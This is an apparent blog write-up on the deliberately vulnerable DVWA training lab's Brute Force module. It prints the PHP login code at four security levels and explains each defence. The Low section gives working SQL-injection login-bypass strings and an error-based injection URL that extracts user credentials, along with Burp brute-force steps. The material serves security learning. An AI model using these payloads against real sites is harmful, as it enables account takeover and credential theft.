靶场环境搭建

https://github.com/ethicalhack3r/DVWA

[网络安全学习篇附]:DVWA 靶场搭建

目录

 

Brute Force Source 暴力破解

Low Brute Force

核心代码

BP爆破

注入

Medium Brute Force

核心代码

High Brute Force

核心代码

Impossible Brute Force


Brute Force Source 暴力破解

Low Brute Force

核心代码

<?php

 

if( isset( $_GET'Login' ] ) ) {

    // 获取用户名

    $user $_GET'username' ];

 

    // 获取密码

    $pass $_GET'password' ];

    $pass md5$pass );

 

    // 查询数据库验证用户名密码

    $query  "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

    $result mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? 

mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res mysqli_connect_error()) ? $___mysqli_res false)) . '</pre>' );

 

    if( $result && mysqli_num_rows$result ) == ) {

//登录成功

        $row    mysqli_fetch_assoc$result );

        $avatar $row["avatar"];

        echo "<p>Welcome to the password protected area {$user}</p>";

        echo "<img src=\"{$avatar}\" />";

    }

    else {

        // 登录失败

        echo "<pre><br />Username and/or password incorrect.</pre>";

    }

 

    ((is_null($___mysqli_res mysqli_close($GLOBALS["___mysqli_ston"]))) ? false $___mysqli_res);

}

 

?>

使用不安全的get方式获取用户名和密码,且没有对用户输入进行过滤,可以考虑进行sql注入,同时服务器也没有设置放爆破机制

BP爆破

直接爆破,bp走一波

设置变量

添加字典

设置线程50,开始攻击

爆破得到密码password

 

注入

1、提交get 请求:?username=admin'--+&password=1&Login=Login#

2、使用用户名 admin' or '1'='1

密码可以为空,登录成功

3、使用用户名admin'#

密码为任意,登录成功

4、报错注入

?username=admin'+and+(select+1+from+(select+count(*),concat((select+cast(concat(user,password)+as+char)+FROM+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+&password=111&Login=Login#

 

 

Medium Brute Force

核心代码

<?php

 

if( isset( $_GET'Login' ] ) ) {

 

   // 获得用户名并过滤

    $user $_GET'username' ];

    $user mysqli_real_escape_string$user ;

    // 获得密码并过滤

    $pass $_GET'password' ];

    $pass mysqli_real_escape_string($pass);

    $pass md5$pass );

    // 查询数据库验证用户名密码

    $query  "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

    $result mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ?

 mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res mysqli_connect_error()) ? $___mysqli_res false)) . '</pre>' );

 

    if( $result && mysqli_num_rows$result ) == ) {

        //登录成功

        $row    mysqli_fetch_assoc$result );

        $avatar $row["avatar"];

        echo "<p>Welcome to the password protected area {$user}</p>";

        echo "<img src=\"{$avatar}\" />";

    }

    else {

       //登录失败

        sleep);

        echo "<pre><br />Username and/or password incorrect.</pre>";

    }

 

    ((is_null($___mysqli_res mysqli_close($GLOBALS["___mysqli_ston"]))) ? false $___mysqli_res);

}

 

?>

中级难度相对于初级难度,增加了msql_real_escape_string 过滤函数,该函数会对[x00,n,r,,’,”,x1a]进行转义,基本上能够抵御sql注入攻击,可能是编码的问题,尝试使用宽字节 %df 绕过失败,虽然加了放爆破机制,sleep(2),讲道理还是可以暴力破解的

 

High Brute Force

核心代码

<?php

 

if( isset( $_GET'Login' ] ) ) {

    // 检测用户的token值

    checkToken$_REQUEST'user_token' ], $_SESSION'session_token' ], 'index.php' );

 

    // 获得用户名并过滤

    $user $_GET'username' ];

    $user stripslashes$user );

    $user mysqli_real_escape_string$user ;

    // 获得密码并过滤

    $pass $_GET'password' ];

    $pass stripslashes$pass );

    $pass mysqli_real_escape_string($pass);

    $pass md5$pass );

 

    // 查询数据库验证用户名密码

    $query  "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

    $result mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res mysqli_connect_error()) ? $___mysqli_res false)) . '</pre>' );

 

    if( $result && mysqli_num_rows$result ) == ) {

        // 登录成功

        $row    mysqli_fetch_assoc$result );

        $avatar $row["avatar"];

        echo "<p>Welcome to the password protected area {$user}</p>";

        echo "<img src=\"{$avatar}\" />";

    }

    else {

        // 登录失败

        sleeprand0) );

        echo "<pre><br />Username and/or password incorrect.</pre>";

    }

 

    ((is_null($___mysqli_res mysqli_close($GLOBALS["___mysqli_ston"]))) ? false $___mysqli_res);

}

 

// Generate Anti-CSRF token

generateSessionToken();

 

?>

高级难度相较于中级的增加了token验证机制,通过bp抓包,可见get 会提交4个参数username,password,login,token

每次服务器返回的页面都会提交一个随机的token值,服务器得到get 请求提交的参数,会先验证token值,具体代码如下:

checkToken$_REQUEST'user_token' ], $_SESSION'session_token' ], 'index.php' );

 

与此同时,还会对用户名和密码,使用stripslashes(去掉字符串中的反斜杠,如果有两个,删除一个)和mysqli_real_escape_string 函数过滤,更进一步防御sql 注入

 

 

Impossible Brute Force

核心代码

<?php

 

if( isset( $_POST'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {

    // 检测token

    checkToken$_REQUEST'user_token' ], $_SESSION'session_token' ], 'index.php' );

 

    // 获取用户名并过滤

    $user $_POST'username' ];

    $user stripslashes$user );

    $user mysqli_real_escape_string($user );

 

    // 获取密码并过滤

    $pass $_POST'password' ];

    $pass stripslashes$pass );

    $pass mysqli_real_escape_string($pass ) ;

    $pass md5$pass );

 

    //设定规则

    $total_failed_login 3;   // 登录失败三次

    $lockout_time       15;   //锁定时间15 个时间单位

    $account_locked     false;   //默认账户锁定1

 

    // 检查用户名是否存在

    $data $db->prepare'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );

    $data->bindParam':user'$userPDO::PARAM_STR );

    $data->execute();

    $row $data->fetch();

 

    // 检测用户是否已经登录失败三次

    if( ( $data->rowCount() == ) && ( $row'failed_login' ] >= $total_failed_login ) )  {

        // User locked out.  Note, using this method would allow for user enumeration!

        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

 

        // 登录失败三次,锁定账户15分钟

        $last_login strtotime$row'last_login' ] );

        $timeout    $last_login + ($lockout_time 60);

        $timenow    time();

 

        /*

        print "The last login was: " . date ("h:i:s", $last_login) . "<br />";

        print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";

        print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";

        */

 

        // 检查是否已经过了足够的时间,如果错误次数<3 ,账户未锁定

        if( $timenow $timeout ) {

            $account_locked true;

            // print "The account is locked<br />";

        }

    }

 

    // 验证用户名和密码

    $data $db->prepare'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );

    $data->bindParam':user'$userPDO::PARAM_STR);

    $data->bindParam':password'$passPDO::PARAM_STR );

    $data->execute();

    $row $data->fetch();

 

    // 如果登录有效

    if( ( $data->rowCount() == ) && ( $account_locked == false ) ) {

        // 登录成功

        $avatar       $row'avatar' ];

        $failed_login $row'failed_login' ];

        $last_login   $row'last_login' ];

        echo "<p>Welcome to the password protected area <em>{$user}</em></p>";

        echo "<img src=\"{$avatar}\" />";

 

        // Had the account been locked out since last login?

        if( $failed_login >= $total_failed_login ) {

            echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";

            echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";

        }

 

        // 重置登录次数

        $data $db->prepare'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );

        $data->bindParam':user'$userPDO::PARAM_STR );

        $data->execute();

    } else {

        // 登录失败

        sleeprand2) );

 

        // 随机延时后返回登录失败信息

        echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";

 

        //更新登录失败次数

        $data $db->prepare'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );

        $data->bindParam':user'$userPDO::PARAM_STR );

        $data->execute();

    }

 

    // 设置最后的登录时间

    $data $db->prepare'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );

    $data->bindParam':user'$userPDO::PARAM_STR );

    $data->execute();

}

 

// Generate Anti-CSRF token

generateSessionToken();

 

?>

 

提交方式由原来的get 变成更为安全的post 方式,并且限制了登录失败次数3次,如果超出限制,锁定账户15分钟,暴力破解是没戏了,在验证机制上设置token,并过滤用户提交参数,防御sql注入,太变态了!!


参考文章:

https://www.freebuf.com/author/lonehand

https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-19

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. js DOM 事件 与http

    第一个接收事件的是window -》 document -》html js获得html节点 document.documentElement;=》body捕获 =》 目标阶段=》 冒泡阶段 event event.preventDefault() 阻止默认事件 比如阻止a标签跳转 event.stopPropagaition() 阻止冒泡 event.stoplmmediatePropagarion() 注…...

    2024/3/14 8:37:06
  2. 【分享】http://t.cn/xxx的短链接如何生成?

    短链接:用通俗的话说,短链接就是把长网址通过程序计算和其他方法转换成短网址,类似于t.cn/xxxx。短链接优势:短小精悍;减少网址字符占用的空间,尤其是在撰写文章和插入网址字符时;搜索引擎优化!应用场景 短网址的应用非常广泛,如短信营销、邮件宣传、微信营销、QQ营销…...

    2024/3/29 16:44:55
  3. 多线程程序

    功能描述:相机采集图片,同时对采集的图片进行处理功能说明:采集和处理两个模块采用线程处理,数据使用循环队列进行存储。主程序#encoding: utf-8该文件用于控制多个相机的采集和算法调用import time import uuid, cv2 import numpy as np import threading from thread…...

    2024/3/14 0:55:25
  4. 006

    软件配置管理的作用?软件配置包括什么 软件配置管理(Software Configuration Management,SCM)是一种标识、组织和控制修改的技术。软件配置管理应用于整个软件工程过程。在软件建立时变更是不可避免的,而变更加剧了项目中软件开发者之间的混乱。SCM活动的目标就是为了标识…...

    2024/3/14 0:55:14
  5. 初学Web前端会用到开发工具【零基础web前端入门视频教程】

    目前市面上比较流行的前端开发工具主要有WebStorm、Vscode、Sublime、HBuilder、notepad++、EditPlus、记事本等,今天介绍一下这些开发工具,并且给出了下载地址。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Cfsy14n7-1591101435577)(https://u…...

    2024/3/14 8:37:02
  6. DVWA靶场-Command Injection 命令注入

    往期博文:DVWA靶场-Brute Force Source 暴力破解靶场环境搭建https://github.com/ethicalhack3r/DVWA[网络安全学习篇附]:DVWA 靶场搭建目录Command Injection 命令注入Low Command Injection核心代码Medium Command Injection核心代码High Command Injection核心代码Impossi…...

    2024/3/14 8:37:02
  7. tensorflow教程

    tf对话create two matrixes层数据输入占位符 对话 import tensorflow as tf create two matrixes matrix1 = tf.constant([[3,3]]) matrix2 = tf.constant([[2],[2]]) product = tf.matmul(matrix1,matrix2)# method 1 sess = tf.Session() result = sess.run(product) print(r…...

    2024/3/14 8:37:03
  8. leetcode--字符串的排列

    题目来自LeetCode,链接:面试题38. 字符串的排列。具体描述为:输入一个字符串,打印出该字符串中字符的所有排列。你可以以任意顺序返回这个字符串数组,但里面不能有重复元素。示例: 输入:s = "abc" 输出:["abc","acb","bac",&q…...

    2024/3/26 19:51:31
  9. 堆的计数

    import java.util.Scanner;public class Main_10 {/*** 题目描述 我们知道包含N个元素的堆可以看成是一棵包含N个节点的完全二叉树。* 每个节点有一个权值。对于小根堆来说,父节点的权值一定小于其子节点的权值。* * 假设N个节点的权值分别是1~N,你能求出一共有多少种不同的小…...

    2024/3/14 0:55:06
  10. 本地文件上传至 Linux 服务器

    本地文件上传至 Linux 服务器服务器使用过程中经常需要与 PC 进行文件交互,交互过程中的文件传输可采用的协议主要有 RDP(远程桌面协议), SSH, FTP(远程文件传输协议) 等。方法主要有 scp, xftp(Xshell 插件), lrzsz, FTP工具等,这里只介绍 scp 的上传下载文件时的用法。一、…...

    2024/3/14 1:22:57
  11. 游戏设计模式——面向数据编程(转)

    作者:KillerAery 出处:http://www.cnblogs.com/KillerAery/随着软件需求的日益复杂发展,远古时期面的向过程编程思想才渐渐萌生了面向对象编程思想。当人们发现面向对象在应对高层软件的种种好处时,越来越沉醉于面向对象,热衷于研究如何更加优雅地抽象出对象。然而现代开发…...

    2024/3/14 1:22:56
  12. 2020年6月程序员工资统计,平均14404元,又跌了,扎心

    见了鬼 本月的平均收入为14404, 本文的articleId为106503404,真是见了鬼。 平均工资 2020年6月全国招收程序员313739人。2020年6月全国程序员平均工资14404元,工资中位数12500元,其中95%的人的工资介于5250元到35000元。虽然收入又下降了,但是岗位比上个月多了起来,随着经…...

    2024/3/14 0:54:56
  13. 2020年6月中国编程语言排行榜

    编程语言比例排名 编程语言 平均工资 工资中位数 最低工资 最高工资 人头 人头百分比1 scala 19973 17500 7000 45000 3175 0.68%2 rust 19229 17500 5352 44229 457 0.10%3 julia 18455 20214 12500 25000 11 0.00%4 python 18350 17500 6000 42500 36648 7.90%5 lua 18168 16…...

    2024/3/14 0:54:45
  14. 特长生考试Day_0

    你根本不知道,让一个已经退役一年的OIer去考特长生,他有多么绝望。 你永远不知道,当你用洛谷查到你最新几次做题记录做的是网络流,差分约束,斜率优化等算法时,然而你连背包、dfs怎么打都忘记时,你有多么绝望。 你永远不知道,当你看自己曾发的题解时竟然看不懂的心情,有…...

    2024/3/14 8:36:59
  15. 一个实验带你快速掌握NAT的多种实现方式,建议收藏反复学习

    认识NAT NAT定义:网络地址转换(NAT,Network Address Translation)属接入广域网(WAN)技术,是一种将私有(保留)地址转化为合法IP地址的转换技术,它被广泛应用于各种类型Internet接入方式和各种类型的网络中。原因很简单,NAT不仅完美地解决了lP地址不足的问题,而且还能够有…...

    2024/3/14 8:36:58
  16. 健壮F.T.+新裸金属重磅发布!全新升级版ZStack加速新基建!

    6月2日,以“健壮F.T.+新裸金属 新基建下的新IaaS”为主题的2020年ZStack新品线上超级发布会引爆了企业级云市场。面向新基建发展契机,致力于普惠云计算的ZStack与英特尔、阿里云等伙伴强势携手发布2大重磅新品:首个采用了F.T.技术的ZStack Mini超融合一体机(简称:ZStack M…...

    2024/3/14 8:36:55
  17. 百度云此链接内容可能涉及侵权,分享的文件已经被取消等屏蔽问题的解决方法

    ...

    2024/3/14 0:54:34
  18. Python的炫技操作:条件语句的七种写法

    前言文的文字及图片来源于网络,仅供学习、交流使用,不具有任何商业用途,版权归原作者所有,如有问题请及时联系我们以作处理。作者: Python极客社区PS:如有需要Python学习资料的小伙伴可以加点击下方链接自行获取http://t.cn/A6Zvjdun有的人说 Python 入门容易,但是精通难的语…...

    2024/3/14 8:36:56
  19. 如何教零基础的人认识Python

    前言 文的文字及图片来源于网络,仅供学习、交流使用,不具有任何商业用途,版权归原作者所有,如有问题请及时联系我们以作处理。 作者: 编程派 PS:如有需要Python学习资料的小伙伴可以加点击下方链接自行获取http://t.cn/A6Zvjdun 什么是code? code就就是一种语言,一种计算机…...

    2024/3/14 8:36:53
  20. 蒙恬新皮肤来袭,看到史诗级别建模之后,大仙直言28碎片太值了

    王者荣耀这款游戏还是非常有意思的,喜欢玩的玩家特别多,以前的游戏只适合小孩子玩,而王者荣耀适合不同年龄段的人,对于王者荣耀中的活动玩家也是比较关心的,因为每次新活动的到来都会伴随着相应的福利,对于王者荣耀中的福利,广大玩家们最关心的莫过于皮肤和新英雄了。目…...

    2024/3/14 3:00:12

最新文章

  1. 俄罗斯深陷芯片自主困境,良率仅5成 |百能云芯

    俄罗斯的芯片产业一直以来都面临着诸多挑战&#xff0c;尤其是在当前的国际形势下&#xff0c;这些挑战更加凸显。随着俄乌冲突的爆发&#xff0c;西方国家对俄罗斯实施了一系列经济制裁&#xff0c;导致俄罗斯科技产业受到了严重影响。据了解&#xff0c;俄国最大的本土芯片厂…...

    2024/3/29 17:44:46
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. MongoDB工作常用操作命令

    MongoDB的工作常用操作命令主要包括启动与关闭MongoDB服务、进入shell操作以及一些常用的shell命令。以下是一些基本步骤和命令&#xff1a; 一、启动与关闭MongoDB服务 启动MongoDB服务&#xff1a; ./mongod -config ../data/mongodb.conf这个命令假设你的MongoDB配置文件…...

    2024/3/24 14:52:03
  4. 2024/3/14打卡k倍区间(8届蓝桥杯)——前缀和+优化***

    题目 给定一个长度为 N 的数列&#xff0c;A1,A2,…AN&#xff0c;如果其中一段连续的子序列 Ai,Ai1,…Aj 之和是 K 的倍数&#xff0c;我们就称这个区间 [i,j] 是 K 倍区间。 你能求出数列中总共有多少个 K 倍区间吗&#xff1f; 输入格式 第一行包含两个整数 N 和 K。 以下 N…...

    2024/3/25 7:28:07
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/3/27 10:21:24
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/3/24 20:11:25
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/3/29 2:45:46
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/3/29 16:26:39
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/3/29 5:19:52
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/3/28 17:01:12
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/3/29 11:11:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/3/29 1:13:26
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/3/29 8:28:16
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/3/29 7:41:19
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/3/24 20:11:18
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/3/29 9:57:23
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/3/29 0:49:46
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/3/24 20:11:15
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/3/29 17:27:19
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/3/24 20:11:13
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/3/26 11:21:23
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/3/28 18:26:34
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/3/28 12:42:28
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/3/28 20:09:10
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
